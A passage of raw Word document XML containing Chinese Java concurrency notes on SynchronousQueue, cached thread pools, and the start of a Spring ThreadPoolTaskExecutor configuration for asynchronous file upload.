          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法来看队列中是否有数据元素，因为数据元素只有当你试着取走的时候才可能存在，不取走而只想偷窥一下是不行的，当然遍历这个队列的操作也是不允许的。队列头元素是第一个排队要插入数据的线程，而不是要交换的数据。数据是在配对的生产者和消费者线程之间直接传递的，并不会将数据缓冲数据到队列中。可以这样来理解：生产者和消费者互相等待对方，握手，然后一起离开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A97B15" w:rsidRPr="00497516" w:rsidRDefault="00A97B15" w:rsidP="00497516">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E7624B" w:rsidRPr="00497516" w:rsidRDefault="00A97B15" w:rsidP="00E8492E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SynchronousQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的一个使用场景是在线程池里。</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Executors.newCachedThreadPool()</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>就使用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SynchronousQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，这个线程池根据需要（新任务到来时）创建新的线程，如果有空闲线程则会重复使用，线程空闲了</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>秒后会被回收。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497516" w:rsidRDefault="00497516" w:rsidP="00497516">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>1.3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E5226C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>多线程</w:t>
      </w:r>
      <w:r w:rsidR="0064494C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC641F" w:rsidRDefault="00DA54D7" w:rsidP="00BC641F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId190" w:history="1">
        <w:r w:rsidR="00BC641F" w:rsidRPr="00321A49">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>http://www.th7.cn/Program/java/201512/723018.shtml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FD5327" w:rsidRPr="00A246D2" w:rsidRDefault="00B77B91" w:rsidP="00B77B91">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00FD5327" w:rsidRPr="00A246D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>异步文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497516" w:rsidRDefault="0040775A" w:rsidP="00A97B15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040775A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>org.springframework.scheduling.concurrent.ThreadPoolTaskExecutor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6025" w:rsidRPr="004D6025" w:rsidRDefault="004D6025" w:rsidP="004D6025">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"taskExecutor"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"org.springframework.scheduling.concurrent.ThreadPoolTaskExecutor"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6025" w:rsidRPr="004D6025" w:rsidRDefault="004D6025" w:rsidP="004D6025">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"corePoolSize"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="004F674F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6025" w:rsidRPr="004D6025" w:rsidRDefault="004D6025" w:rsidP="004D6025">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"maxPoolSize"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="004F674F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6025" w:rsidRPr="004D6025" w:rsidRDefault="004D6025" w:rsidP="004D6025">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F7F7F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2A00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"queueCapacity"</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D6025">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="7F007F"/>
